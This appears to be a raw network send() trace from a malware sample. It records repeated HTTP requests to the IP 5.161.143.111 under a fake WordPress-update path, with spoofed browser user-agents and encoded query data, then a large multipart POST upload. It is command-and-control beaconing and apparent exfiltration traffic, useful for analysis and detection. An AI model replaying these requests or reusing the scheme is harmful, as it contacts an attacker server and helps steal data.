IyMjJWO1gzMkJGO3UTMzUmMlJ2YlVjZzMDM1kTY4Y2M3YDNycDNwgDOiojI5kzMkhzN0MDN4ADOmFDZ2czMhBjYkVmZlBDZ0MDZ4QmIsIyY0gTNyYGM4UWY5MzYiZWM4IGMyY2Y3YDZklDZ5ATZhVWZ5MWZmRTMiojI4E2M3cTNiZGMwQTM1QGOxIGOhdDNiNjY4Q2YlF2NlBjI7xSfiADWmlGOqlkNJNkTpRGValmTXpFeNdlT6lFRNNTUX9EeN1WW0k1RaBTWqpleFpXTspEVOh3Yq5EenpmW0MGRPl2cu9UaFdEZoJVRkRjVtl0cVp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarNUT4FUeaVHbHN2dWdEZUJ0QPFTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1dnpGT5F0QRdWVGVFRCNUT3FFRPRXVUF2ZrNFVVh2UalXOyE1ZrlWVvd3VaBTNXNVavpWSsFzVZ9kVGVFRKNETpt2URZHNFt0ZJhlWwIEWZtmRFlkeOdVYvJEWZlHZFlkQktmVnFVbjhmUtJGaSNTVp9maJxWMXl1TWZUVIp0QMl2aslkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWUq50Z0UUSzZUbiZHbyMmeW1mW2pESVd2YElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKNkYxkzVaRVOTlFcOhVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXSTlFbKNjYMJ0QhBjVzIGVCNFTnF1VaBnWXFmaWd0Y6J0QkZXNrlkNJlnW5lTbJNXS55kMjRUT1NmaNh3dT9UMVpmT1NmeNl2bqlka5ckYpdXaJNFdrlkNJNVZ5JlbiFTOykVa3lWSzZ1MixmTslkNJlmY2xmMaxmSul0cJNFZuFTaiZHZzI2TKl2TptGSkBnTtl0cJlWTxUkaMBTTU1UdnRUT5RzUONTRqlkNJN0YwpUelZTS5JWb1c1U3x2aJNXSp1UeRNzYsJlbJZTSTpFdG1GV5ZlMjZlSDxUaNVUV0lkaNVlTWJVVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIzMwMGNkFDN5IjNjNGNzQTYyYmZjlTN2IWMyEmZxgTOiwiI0MWN0AjY1cDMmdDMzYTO2QDZwQ2Y0E2YzcTN4YWY0MGZyYjZ0EjMmJiOikTOzQGO3QzM0gDM4YWMkZzNzEGMiRWZmVGMkRzMkhDZiwiIjRDO1IjZwgTZhlzMjJmZxgjYwIjZjdjNkRWOklDMlFWZllzYlZGNxIiOigTYzczN1ImZwADNxUDZ4EjY4E2N0I2MihDZjVWY3UGMis3W HTTP/1.1 Accept: */* Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 5.161.143.111
socket: 2464
sent: 2561
1 2561 0

send

buffer: GET /Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?zd6j65aNjuVpR2dlLFVTgimdEO6=YyfjnbjzFmbPFeceXRnVmMkDT&SQ0=fr9nyvPwBzSofinF&30126795304c4b35e576547908d90d67=jJmYkZTZxImYjR2NkRjZhNGO0ImYwMjZmRmY3U2NwkjNxYWZ4UTY3MjM4QDN0cTM0YDOzMjM&9a96373b97fc1a2b0de79e211da21f57=wYmVDNkljZzQzMwEmNzkjY5gTZ0QTOjBjZjVmNjNTM0UTYzUTNxETY&6967395b662dd465398b11d85162f0d3=d1nIzMmY5UDOzQmY4cTNxMTZyUmYjVWNmNzMwUTOhhjZzcjN0IzN0ADO4IiOikTOzQGO3QzM0gDM4YWMkZzNzEGMiRWZmVGMkRzMkhDZiwiIjRDO1IjZwgTZhlzMjJmZxgjYwIjZjdjNkRWOklDMlFWZllzYlZGNxIiOigTYzczN1ImZwADNxUDZ4EjY4E2N0I2MihDZjVWY3UGMis3W&989f9bfdbcf48eb9c6ec71e7025d32af=d1nIiojIyMDMjRDZxQTOyYzYjRzM0EmMmZ2Y5UjNiFjMhZWM4kjIsIyMjJWO1gzMkJGO3UTMzUmMlJ2YlVjZzMDM1kTY4Y2M3YDNycDNwgDOiojI5kzMkhzN0MDN4ADOmFDZ2czMhBjYkVmZlBDZ0MDZ4QmIsIyY0gTNyYGM4UWY5MzYiZWM4IGMyY2Y3YDZklDZ5ATZhVWZ5MWZmRTMiojI4E2M3cTNiZGMwQTM1QGOxIGOhdDNiNjY4Q2YlF2NlBjI7xSfiADWmlGOqlkNJNkTpRGValmTXpFeNdlT6lFRNNTUX9EeN1WW0k1RaBTWqpleFpXTspEVOh3Yq5EenpmW0MGRPl2cu9UaFdEZoJVRkRjVtl0cVp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarNUT4FUeaVHbHN2dWdEZUJ0QPFTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1dnpGT5F0QRdWVGVFRCNUT3FFRPRXVUF2ZrNFVVh2UalXOyE1ZrlWVvd3VaBTNXNVavpWSsFzVZ9kVGVFRKNETpt2URZHNFt0ZJhlWwIEWZtmRFlkeOdVYvJEWZlHZFlkQktmVnFVbjhmUtJGaSNTVp9maJxWMXl1TWZUVIp0QMl2aslkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWUq50Z0UUSzZUbiZHbyMmeW1mW2pESVd2YElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKNkYxkzVaRVOTlFcOhVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXSTlFbKNjYMJ0QhBjVzIGVCNFTnF1VaBnWXFmaWd0Y6J0QkZXNrlkNJlnW5lTbJNXS55kMjRUT1NmaNh3dT9UMVpmT1NmeNl2bqlka5ckYpdXaJNFdrlkNJNVZ5JlbiFTOykVa3lWSzZ1MixmTslkNJlmY2xmMaxmSul0cJNFZuFTaiZHZzI2TKl2TptGSkBnTtl0cJlWTxUkaMBTTU1UdnRUT5RzUONTRqlkNJN0YwpUelZTS5JWb1c1U3x2aJNXSp1UeRNzYsJlbJZTSTpFdG1GV5ZlMjZlSDxUaNVUV0lkaNVlTWJVVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIzMwMGNkFDN5IjNjNGNzQTYyYmZjlTN2IWMyEmZxgTOiwiI0MWN0AjY1cDMmdDMzYTO2QDZwQ2Y0E2YzcTN4YWY0MGZyYjZ0EjMmJiOikTOzQGO3QzM0gDM4YWMkZzNzEGMiRWZmVGMkRzMkhDZiwiIjRDO1IjZwgTZhlzMjJmZxgjYwIjZjdjNkRWOklDMlFWZllzYlZGNxIiOigTYzczN1ImZwADNxUDZ4EjY4E2N0I2MihDZjVWY3UGMis3W HTTP/1.1 Accept: */* Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 5.161.143.111
socket: 2104
sent: 2561
1 2561 0

send

buffer: GET /Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?zd6j65aNjuVpR2dlLFVTgimdEO6=YyfjnbjzFmbPFeceXRnVmMkDT&SQ0=fr9nyvPwBzSofinF&30126795304c4b35e576547908d90d67=jJmYkZTZxImYjR2NkRjZhNGO0ImYwMjZmRmY3U2NwkjNxYWZ4UTY3MjM4QDN0cTM0YDOzMjM&9a96373b97fc1a2b0de79e211da21f57=wYmVDNkljZzQzMwEmNzkjY5gTZ0QTOjBjZjVmNjNTM0UTYzUTNxETY&6967395b662dd465398b11d85162f0d3=d1nIiRWNiVGZmBjY3MTM3E2NwEmZmJ2Y5ImNkNDM1U2NzgTN1M2M1UTYxIiOikTOzQGO3QzM0gDM4YWMkZzNzEGMiRWZmVGMkRzMkhDZiwiIjRDO1IjZwgTZhlzMjJmZxgjYwIjZjdjNkRWOklDMlFWZllzYlZGNxIiOigTYzczN1ImZwADNxUDZ4EjY4E2N0I2MihDZjVWY3UGMis3W HTTP/1.1 Accept: */* Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 5.161.143.111
socket: 2104
sent: 863
1 863 0

send

buffer: GET /Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?zd6j65aNjuVpR2dlLFVTgimdEO6=YyfjnbjzFmbPFeceXRnVmMkDT&SQ0=fr9nyvPwBzSofinF&30126795304c4b35e576547908d90d67=jJmYkZTZxImYjR2NkRjZhNGO0ImYwMjZmRmY3U2NwkjNxYWZ4UTY3MjM4QDN0cTM0YDOzMjM&9a96373b97fc1a2b0de79e211da21f57=wYmVDNkljZzQzMwEmNzkjY5gTZ0QTOjBjZjVmNjNTM0UTYzUTNxETY&6967395b662dd465398b11d85162f0d3=d1nIzMmY5UDOzQmY4cTNxMTZyUmYjVWNmNzMwUTOhhjZzcjN0IzN0ADO4IiOikTOzQGO3QzM0gDM4YWMkZzNzEGMiRWZmVGMkRzMkhDZiwiIjRDO1IjZwgTZhlzMjJmZxgjYwIjZjdjNkRWOklDMlFWZllzYlZGNxIiOigTYzczN1ImZwADNxUDZ4EjY4E2N0I2MihDZjVWY3UGMis3W&989f9bfdbcf48eb9c6ec71e7025d32af=d1nIiojIyMDMjRDZxQTOyYzYjRzM0EmMmZ2Y5UjNiFjMhZWM4kjIsIyMjJWO1gzMkJGO3UTMzUmMlJ2YlVjZzMDM1kTY4Y2M3YDNycDNwgDOiojI5kzMkhzN0MDN4ADOmFDZ2czMhBjYkVmZlBDZ0MDZ4QmIsIyY0gTNyYGM4UWY5MzYiZWM4IGMyY2Y3YDZklDZ5ATZhVWZ5MWZmRTMiojI4E2M3cTNiZGMwQTM1QGOxIGOhdDNiNjY4Q2YlF2NlBjI7xSfiADWmlGOqlkNJNkTpRGValmTXpFeNdlT6lFRNNTUX9EeN1WW0k1RaBTWqpleFpXTspEVOh3Yq5EenpmW0MGRPl2cu9UaFdEZoJVRkRjVtl0cVp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarNUT4FUeaVHbHN2dWdEZUJ0QPFTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1dnpGT5F0QRdWVGVFRCNUT3FFRPRXVUF2ZrNFVVh2UalXOyE1ZrlWVvd3VaBTNXNVavpWSsFzVZ9kVGVFRKNETpt2URZHNFt0ZJhlWwIEWZtmRFlkeOdVYvJEWZlHZFlkQktmVnFVbjhmUtJGaSNTVp9maJxWMXl1TWZUVIp0QMl2aslkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWUq50Z0UUSzZUbiZHbyMmeW1mW2pESVd2YElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKNkYxkzVaRVOTlFcOhVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXSTlFbKNjYMJ0QhBjVzIGVCNFTnF1VaBnWXFmaWd0Y6J0QkZXNrlkNJlnW5lTbJNXS55kMjRUT1NmaNh3dT9UMVpmT1NmeNl2bqlka5ckYpdXaJNFdrlkNJNVZ5JlbiFTOykVa3lWSzZ1MixmTslkNJlmY2xmMaxmSul0cJNFZuFTaiZHZzI2TKl2TptGSkBnTtl0cJlWTxUkaMBTTU1UdnRUT5RzUONTRqlkNJN0YwpUelZTS5JWb1c1U3x2aJNXSp1UeRNzYsJlbJZTSTpFdG1GV5ZlMjZlSDxUaNVUV0lkaNVlTWJVVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIzMwMGNkFDN5IjNjNGNzQTYyYmZjlTN2IWMyEmZxgTOiwiI0MWN0AjY1cDMmdDMzYTO2QDZwQ2Y0E2YzcTN4YWY0MGZyYjZ0EjMmJiOikTOzQGO3QzM0gDM4YWMkZzNzEGMiRWZmVGMkRzMkhDZiwiIjRDO1IjZwgTZhlzMjJmZxgjYwIjZjdjNkRWOklDMlFWZllzYlZGNxIiOigTYzczN1ImZwADNxUDZ4EjY4E2N0I2MihDZjVWY3UGMis3W HTTP/1.1 Accept: */* Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 5.161.143.111
socket: 2104
sent: 2561
1 2561 0

send

buffer: GET /Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?zd6j65aNjuVpR2dlLFVTgimdEO6=YyfjnbjzFmbPFeceXRnVmMkDT&SQ0=fr9nyvPwBzSofinF&30126795304c4b35e576547908d90d67=jJmYkZTZxImYjR2NkRjZhNGO0ImYwMjZmRmY3U2NwkjNxYWZ4UTY3MjM4QDN0cTM0YDOzMjM&9a96373b97fc1a2b0de79e211da21f57=wYmVDNkljZzQzMwEmNzkjY5gTZ0QTOjBjZjVmNjNTM0UTYzUTNxETY&6967395b662dd465398b11d85162f0d3=d1nIzMmY5UDOzQmY4cTNxMTZyUmYjVWNmNzMwUTOhhjZzcjN0IzN0ADO4IiOikTOzQGO3QzM0gDM4YWMkZzNzEGMiRWZmVGMkRzMkhDZiwiIjRDO1IjZwgTZhlzMjJmZxgjYwIjZjdjNkRWOklDMlFWZllzYlZGNxIiOigTYzczN1ImZwADNxUDZ4EjY4E2N0I2MihDZjVWY3UGMis3W&989f9bfdbcf48eb9c6ec71e7025d32af=d1nIiojIyMDMjRDZxQTOyYzYjRzM0EmMmZ2Y5UjNiFjMhZWM4kjIsIyMjJWO1gzMkJGO3UTMzUmMlJ2YlVjZzMDM1kTY4Y2M3YDNycDNwgDOiojI5kzMkhzN0MDN4ADOmFDZ2czMhBjYkVmZlBDZ0MDZ4QmIsIyY0gTNyYGM4UWY5MzYiZWM4IGMyY2Y3YDZklDZ5ATZhVWZ5MWZmRTMiojI4E2M3cTNiZGMwQTM1QGOxIGOhdDNiNjY4Q2YlF2NlBjI7xSfiADWmlGOqlkNJNkTpRGValmTXpFeNdlT6lFRNNTUX9EeN1WW0k1RaBTWqpleFpXTspEVOh3Yq5EenpmW0MGRPl2cu9UaFdEZoJVRkRjVtl0cVp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarNUT4FUeaVHbHN2dWdEZUJ0QPFTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1dnpGT5F0QRdWVGVFRCNUT3FFRPRXVUF2ZrNFVVh2UalXOyE1ZrlWVvd3VaBTNXNVavpWSsFzVZ9kVGVFRKNETpt2URZHNFt0ZJhlWwIEWZtmRFlkeOdVYvJEWZlHZFlkQktmVnFVbjhmUtJGaSNTVp9maJxWMXl1TWZUVIp0QMl2aslkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWUq50Z0UUSzZUbiZHbyMmeW1mW2pESVd2YElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKNkYxkzVaRVOTlFcOhVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXSTlFbKNjYMJ0QhBjVzIGVCNFTnF1VaBnWXFmaWd0Y6J0QkZXNrlkNJlnW5lTbJNXS55kMjRUT1NmaNh3dT9UMVpmT1NmeNl2bqlka5ckYpdXaJNFdrlkNJNVZ5JlbiFTOykVa3lWSzZ1MixmTslkNJlmY2xmMaxmSul0cJNFZuFTaiZHZzI2TKl2TptGSkBnTtl0cJlWTxUkaMBTTU1UdnRUT5RzUONTRqlkNJN0YwpUelZTS5JWb1c1U3x2aJNXSp1UeRNzYsJlbJZTSTpFdG1GV5ZlMjZlSDxUaNVUV0lkaNVlTWJVVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIzMwMGNkFDN5IjNjNGNzQTYyYmZjlTN2IWMyEmZxgTOiwiI0MWN0AjY1cDMmdDMzYTO2QDZwQ2Y0E2YzcTN4YWY0MGZyYjZ0EjMmJiOikTOzQGO3QzM0gDM4YWMkZzNzEGMiRWZmVGMkRzMkhDZiwiIjRDO1IjZwgTZhlzMjJmZxgjYwIjZjdjNkRWOklDMlFWZllzYlZGNxIiOigTYzczN1ImZwADNxUDZ4EjY4E2N0I2MihDZjVWY3UGMis3W HTTP/1.1 Accept: */* Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 5.161.143.111
socket: 2104
sent: 2561
1 2561 0

send

buffer: GET /Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?zd6j65aNjuVpR2dlLFVTgimdEO6=YyfjnbjzFmbPFeceXRnVmMkDT&SQ0=fr9nyvPwBzSofinF&30126795304c4b35e576547908d90d67=jJmYkZTZxImYjR2NkRjZhNGO0ImYwMjZmRmY3U2NwkjNxYWZ4UTY3MjM4QDN0cTM0YDOzMjM&9a96373b97fc1a2b0de79e211da21f57=wYmVDNkljZzQzMwEmNzkjY5gTZ0QTOjBjZjVmNjNTM0UTYzUTNxETY&989f9bfdbcf48eb9c6ec71e7025d32af=0VfiIiOiIzMwMGNkFDN5IjNjNGNzQTYyYmZjlTN2IWMyEmZxgTOiwiImRWYjhzMkBDMyEzM0YjMyMGZjNjMhBjN5UDNxATO5YTZlhzNmZmYkJiOikTOzQGO3QzM0gDM4YWMkZzNzEGMiRWZmVGMkRzMkhDZiwiIjRDO1IjZwgTZhlzMjJmZxgjYwIjZjdjNkRWOklDMlFWZllzYlZGNxIiOigTYzczN1ImZwADNxUDZ4EjY4E2N0I2MihDZjVWY3UGMis3W HTTP/1.1 Accept: */* Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 5.161.143.111
socket: 2104
sent: 914
1 914 0

send

buffer: GET /Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?zd6j65aNjuVpR2dlLFVTgimdEO6=YyfjnbjzFmbPFeceXRnVmMkDT&SQ0=fr9nyvPwBzSofinF&30126795304c4b35e576547908d90d67=jJmYkZTZxImYjR2NkRjZhNGO0ImYwMjZmRmY3U2NwkjNxYWZ4UTY3MjM4QDN0cTM0YDOzMjM&9a96373b97fc1a2b0de79e211da21f57=wYmVDNkljZzQzMwEmNzkjY5gTZ0QTOjBjZjVmNjNTM0UTYzUTNxETY&8f099c46b18199a489f2d28eafb098db=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 HTTP/1.1 Accept: */* Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 5.161.143.111
socket: 2104
sent: 3195
1 3195 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer: GET /Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?zd6j65aNjuVpR2dlLFVTgimdEO6=YyfjnbjzFmbPFeceXRnVmMkDT&SQ0=fr9nyvPwBzSofinF&30126795304c4b35e576547908d90d67=jJmYkZTZxImYjR2NkRjZhNGO0ImYwMjZmRmY3U2NwkjNxYWZ4UTY3MjM4QDN0cTM0YDOzMjM&9a96373b97fc1a2b0de79e211da21f57=wYmVDNkljZzQzMwEmNzkjY5gTZ0QTOjBjZjVmNjNTM0UTYzUTNxETY&989f9bfdbcf48eb9c6ec71e7025d32af=QX9JSUNJiOiIzMwMGNkFDN5IjNjNGNzQTYyYmZjlTN2IWMyEmZxgTOiwiIiRWNiVGZmBjY3MTM3E2NwEmZmJ2Y5ImNkNDM1U2NzgTN1M2M1UTYxIiOikTOzQGO3QzM0gDM4YWMkZzNzEGMiRWZmVGMkRzMkhDZiwiIjRDO1IjZwgTZhlzMjJmZxgjYwIjZjdjNkRWOklDMlFWZllzYlZGNxIiOigTYzczN1ImZwADNxUDZ4EjY4E2N0I2MihDZjVWY3UGMis3W HTTP/1.1 Accept: */* Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 5.161.143.111
socket: 2104
sent: 917
1 917 0

send

buffer: POST /Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?zd6j65aNjuVpR2dlLFVTgimdEO6=YyfjnbjzFmbPFeceXRnVmMkDT&SQ0=fr9nyvPwBzSofinF&30126795304c4b35e576547908d90d67=jJmYkZTZxImYjR2NkRjZhNGO0ImYwMjZmRmY3U2NwkjNxYWZ4UTY3MjM4QDN0cTM0YDOzMjM&9a96373b97fc1a2b0de79e211da21f57=wYmVDNkljZzQzMwEmNzkjY5gTZ0QTOjBjZjVmNjNTM0UTYzUTNxETY HTTP/1.1 Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryVmZa55Bw1MkedKHT User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 5.161.143.111 Content-Length: 88507 Expect: 100-continue
socket: 2104
sent: 697
1 697 0

send

buffer:
socket: 2104
sent: 88507
1 88507 0

send

buffer:
socket: 2464
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send

buffer:
socket: 2104
sent: 7408
1 7408 0

send
